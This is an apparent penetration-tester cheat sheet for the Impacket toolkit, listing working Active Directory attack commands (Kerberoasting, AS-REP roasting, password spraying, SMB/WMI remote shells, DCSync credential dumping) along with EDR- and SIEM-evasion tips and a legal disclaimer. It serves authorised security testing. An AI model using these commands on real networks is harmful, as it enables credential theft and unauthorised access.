Impacket — Install, Use, Optimise (2026)

Python library for SMB/Kerberos/MSRPC protocols — the swiss-army knife of post-exploitation Active Directory.

Installation

Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.

pipx (recommended)

pipx install impacket

Linux (apt)

sudo apt install impacket-scripts

Source

git clone https://github.com/fortra/impacket && cd impacket && pip install .

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

Kerberoast (extract service tickets)

GetUserSPNs.py corp.local/user:pass -dc-ip 10.0.0.1 -request

AS-REP roast (preauth disabled users)

GetNPUsers.py corp.local/ -usersfile users.txt -no-pass -dc-ip 10.0.0.1

Password spray over SMB

crackmapexec smb 10.0.0.0/24 -u users.txt -p Spring2026!

PSExec-like SMB shell

psexec.py corp.local/user:[email protected]

WMI shell (stealthier)

wmiexec.py corp.local/user:[email protected]

DCSync via secretsdump

secretsdump.py corp.local/user:[email protected] -just-dc

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

• secretsdump.py -just-dc-ntlm is faster than full DCSync — skips LSA secrets and SAM dump.
• -target-ip when DNS resolution fails — saves 30s per host on big sweeps.
• -debug shows the wire-level protocol — invaluable for diagnosing kerberos errors.
• All scripts support -k -no-pass for ticket-based auth (after export KRB5CCNAME=/tmp/admin.ccache).
• -codec utf-8 for non-English domains (Indian companies with देवनागरी / regional charset entries).

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

• psexec.py drops a service binary on disk — Defender catches it. Use wmiexec.py or smbexec.py for fileless.
• Kerberos clock skew: must match DC time within 5 min. sudo ntpdate dc.corp.local first.
• -just-dc with insufficient privs returns silently — ensure DCSync rights (Replicating Directory Changes).
• GetNPUsers runs ldapsearch loudly — Splunk/QRadar can alert on AS-REP volume.

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

• NetExec (former CrackMapExec) — wraps Impacket for bulk operations.
• Rubeus — Windows-native Kerberos tooling.
• BloodHound.py — the Python collector also uses Impacket internally.

India context and engagement notes

For Indian banking AD engagements (RBI/SEBI scope): Impacket’s Kerberoast + secretsdump is the canonical attack chain that auditors expect to see referenced in pen-test reports. Run from a Linux jump-box (Kali) — keeps tool execution off Windows endpoints where EDR catches everything.

⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.